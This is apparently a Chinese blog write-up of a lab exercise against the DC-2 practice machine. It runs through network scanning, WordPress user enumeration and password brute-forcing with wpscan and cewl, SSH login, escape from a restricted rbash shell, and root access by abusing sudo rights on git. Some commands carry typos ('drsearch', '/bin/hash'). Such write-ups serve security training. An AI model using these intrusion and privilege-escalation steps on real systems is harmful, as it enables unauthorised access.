DC-2靶机渗透全流程详细

接上一篇，本文为DC系列靶机DC-2渗透笔记

渗透环境：

攻击机Kali（Linux） IP：192.168.211.1

靶机：DC-2.ovk（Linux）  IP：未知

首先导入DC-1靶机到VM中，并且开启靶机

将靶机与攻击机设置在同一网段下，这样靶机才能被攻击机扫描到，可以同时设置为桥接或者NAT模式。

一、检测同一网段下的IP

使用工具arp-scan

扫描当前网段所有IP：

arp-scan -l

靶机IP：192.168.211.132

在之前已经介绍过其他办法，这里就不一一陈列。

感兴趣的朋友可以看看本专栏前一篇文章

DC-1靶机渗透全流程详细-CSDN博客

二、探测端口和服务

使用工具nmap

命令：

nmap -sV -p- 192.168.211.132

开放的服务有http和ssh，ssh的端口是7744

去网页访问80端口

会发现显示访问不了。

考虑IP未遵循重定向到域名

用nmap -A 全扫描其实就可以发现这个问题

这时候需要设置hosts文件，添加一条:

192.168.211.132  dc-2

kali的hosts文件在/etc/hosts

用vim打开添加

添加完之后就能访问了

指纹识别为WordPress框架，这是一个应用广泛的博客框架，迄今为止关于它和它的扩展及插件的漏洞都有不少。但是很可惜，我尝试过用metaspolit进行攻击，没有成功。

看到flag1

Flag1提示 

cewl

cewl是一个字典生成工具

Flag1提示我们需要用这个工具生成网站相关的字典，这个字典大概率是密码，但其实我们并没有找到登录的页面，这时候需要用网站目录扫描工具进行扫描

命令：

drsearch -u http://dc-2/ -e * -x 404 403
#-e * 使用所有语言
#-x 不返回的页面

三、网页渗透

找到登录页面

访问

现在我们可以去生成密码字典了，生成位置默认为当前目录，当然也可以自己设置

命令：

cewl http://dc-2/ -w dict.txt #dict.txt为自命名文件

 现在有了密码，还差账号，这时候需要用到另一个工具

获取站点用户名

WPScan是一款专门针对Wordpress网站的漏洞扫描工具，它还可以实现获取站点用户名。

 命令：

wpscan --url dc-2 -e u

成功找到了三个用户，现在用户和密码字典都有了，我们可以开始爆破了。

爆破密码

依旧是用WPScan，把用户名装到txt文件里面去

命令：

wpscan --url dc-2 -U name.txt -P dict.txt

成功爆出了jerry用户和tom用户的密码

现在去登录

在jerry用户的ALL Pages页面下找到了flag2

Flag2文件提示……还不如不提示

 

它让我们去找其他方法，我们在信息收集的时候发现ssh服务是开放的，那我们尝试一下用得到的两个账号密码去登录

四、SSH登录

前面在信息收集的时候，得到了SSH端口为7744，而不是默认的22，这一点要注意

经过尝试jerry不行，tom可以

ssh tom@192.168.211.132 -p 7744

进入账户后第一件事就是查看当前权限

 Rbash限制

关于rbash：

1.rbash是什么？

rbash是Restricted bash缩写,即受限制的bash。 管理员可通过指定普通用户的bash为rbash,以此来限制相关操作。简单来说，区别于一般的shell，它会限制一些行为，让一些命令无法执行。

2.设置rbash

cp  /bin/bash  /bin/rbash  #复制一个bash，重命名为rbash

useradd -s  /bin/rbash  tom  #设置用户tom登陆的shell为rbash

mkdir -p  /home/tom/.bin  #在tom用户下新建一个.bin目录存放可以执行的命令

关于rbash的逃逸方法：

【渗透测试】--- rbash逃逸方法简述-CSDN博客

现在我们确定一下在rbash的限制下，有哪些命令是可用的

查看环境变量

查看环境下可用命令 

rbash的逃逸

这里有两种可用

1使用vi（vim）命令，设置shell

命令vi进入编辑界面，写入

:set shell=/bin/bash

:shell

加入后回车，当看见退出了vi编辑器就说明成功了

 

这时候查看可用命令

依旧不能，这是因为没有设置环境变量，系统找不到该用的shell

添加以下两条路径

export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

 这时候就可以明确看到环境变量发生了改变

2利用bash_cmds自定义一个shell

BASH_CMDS[X]=/bin/hash

执行x的时候就相当于在执行shell

这个同样是需要设置环境变量，这里就不再赘述

获得命令权限后，我们寻找下一个flag

找到flag3，提示su

su是切换账户的命令，现在我们唯一另外的账户就是jerry，试试吧

账号：jerry 密码：adipiscing

密码来自于前面WPScan爆破所得

Ok,查看权限

查找下一个flag

find / -name '*flag*'

Flag4提示git，应该是要提权，一般最后一个flag都是提权到root

五、提权

在DC-1靶机中我们使用了SUID提权，先试试吧

SUID提权

命令：利用find命令，找查具有SUID权限的可执行二进制文件

find / -perm -u=s -type f 2>/dev/null

确实没找到什么有用的命令，find也没有

那就看看当前哪些能使用root权限吧，命令：

sudo -l

Git可以

git提权

方法1

命令：

sudo git help config

回车然后输入：

!/bin/hash

成功

方法2

命令：

sudo git -p help

回车然后输入：

!/bin/hash

 现在找寻最后一个flag吧

完结撒花~最后来一个海琴烟的全图~